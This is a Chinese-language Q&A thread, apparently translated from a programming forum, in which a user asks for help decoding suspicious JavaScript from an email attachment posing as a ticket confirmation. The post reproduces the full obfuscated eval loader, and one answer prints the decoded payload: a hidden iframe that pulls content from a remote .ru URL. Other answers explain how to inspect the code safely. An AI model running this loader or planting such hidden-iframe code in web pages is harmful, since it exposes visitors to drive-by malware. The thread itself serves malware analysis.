反混淆/解析字符串

时间:2012-03-20 05:50:28

标签: javascript string

我今天在电子邮件附件中收到以下内容,声明这是我确实购买的机票的确认。请帮助我理解如何解构这段代码......

<script>
// Obfuscated loader (the sample under analysis). It turns a list of numbers
// into JavaScript source text and hands that text to eval.
c = 2;
i = c - 2; // i starts at 0 and is reused below as the decode-loop index
// c is the number 2, so c.prototype is undefined and `new c.prototype` throws.
// The decoder lives in the catch block, so it runs only after that throw.
// NOTE(review): presumably this is meant to defeat analysers that do not model
// exceptions; the intent is inferred, not shown by the code.
if (window.document) try {
    new c.prototype
} catch (hgberger) {
    // A single string of 'n'-separated decimal numbers; split('n') yields one
    // array entry (still a string) per encoded character.
    f = ['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n76n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n-6n81n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n1n-6n77n78n83n70n63n23n1n80n67n77n67n60n67n70n67n78n83n20n66n67n62n62n63n72n21n74n73n77n67n78n67n73n72n20n59n60n77n73n70n79n78n63n21n70n63n64n78n20n10n21n78n73n74n20n10n21n1n24n22n9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29n87n-25n-29n-29n64n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85n-25n-29n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n61n76n63n59n78n63n31n70n63n71n63n72n78n2n1n67n64n76n59n71n63n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61n1n6n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n3n21n64n8n77n78n83n70n63n8n80n67n77n67n60n67n70n67n78n83n23n1n66n67n62n62n63n72n1n21n64n8n77n78n83n70n63n8n74n73n77n67n78n67n73n72n23n1n59n60n77n73n70n79n78n63n1n21n64n8n77n78n83n70n63n8n70n63n64n78n23n1n10n1n21n64n8n77n78n83n70n63n8n78n73n74n23n1n10n1n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n81n67n62n78n66n1n6n1n11n10n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n66n63n67n65n66n78n1n6n1n11n10n1n3n21n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n8n59n74n74n63n72n62n29n66n67n70n62n2n64n3n21n-25n-29n-29n87'][0].split('n');
    md = 'a'; // never read anywhere in the visible code
    // Looks up window.eval through a concatenated key, so the literal token
    // "eval" never appears in the source. A static signature for this family
    // has to match the split form ("e" + "val"), not just the plain name.
    e = window["e" + "val"];
    w = f;
    s = []; // starts as an array; `+=` with a string below coerces it to a string
    r = String;
    // Hard-coded bound of 613 iterations.
    // NOTE(review): presumably equal to the number of entries in w; not counted here.
    for (; 613 != i; i += 1) {
        j = i;
        // Decoding rule: character code = entry + 38. `1 * w[j]` converts the
        // string entry to a number before the addition.
        s += r.fromCharCode(38 + 1 * w[j]);
    }
    // Runs the decoded text. For analysis, this is the call to replace with a
    // display-only sink so the payload is shown instead of executed.
    e(s);
}</script>

3 个答案:

答案 0 :(得分:3)

反混淆后的代码:

// Decoded payload, as posted in this answer. It adds a 10x10 iframe with
// visibility:hidden, absolutely positioned at the top-left corner, whose src
// is a remote URL on port 8080. The browser fetches that URL without anything
// visible appearing on the page. What the URL serves is not shown here.
// The hostname, port and path below are usable as network indicators when
// searching proxy or DNS logs.
// If <body> already exists, the iframe is appended through the DOM. The call to
// iframer() precedes its definition in the text, which works because function
// declarations are hoisted.
if (document.getElementsByTagName('body')[0]){
            iframer();
        } else {
            // No <body> yet: write the same hidden iframe as raw markup instead.
            document.write("<iframe src='http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
        }
        // Builds the hidden iframe element and appends it to the first <body>.
        function iframer(){
            var f = document.createElement('iframe');f.setAttribute('src','http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
            document.getElementsByTagName('body')[0].appendChild(f);
        }

答案 1 :(得分:2)

我把你发布的代码原样粘贴到了 http://jsfiddle.net。我唯一改动的地方(也建议你这样做)是把对 e(s) 的调用改成 alert(s)。这样,浏览器就不会执行解码出来的嵌入代码,而只是把它显示出来。注意,脚本的其余部分(包括解码循环)仍然会运行,因此最好在隔离环境(例如虚拟机)中进行。

你会看到一些与 iframe 和 dnvfodooshdkfhha.ru 有关的可疑内容,看起来像是垃圾站点。

答案 2 :(得分:1)

看起来该字符串是由 'n' 分隔的字符代码列表(循环中每个数字加上 38 后才是实际的字符编码)。如果把最后一行的 e(s) 替换为 alert(s) 再运行代码,就能看到恶意软件试图用 eval 执行的、被混淆隐藏的代码。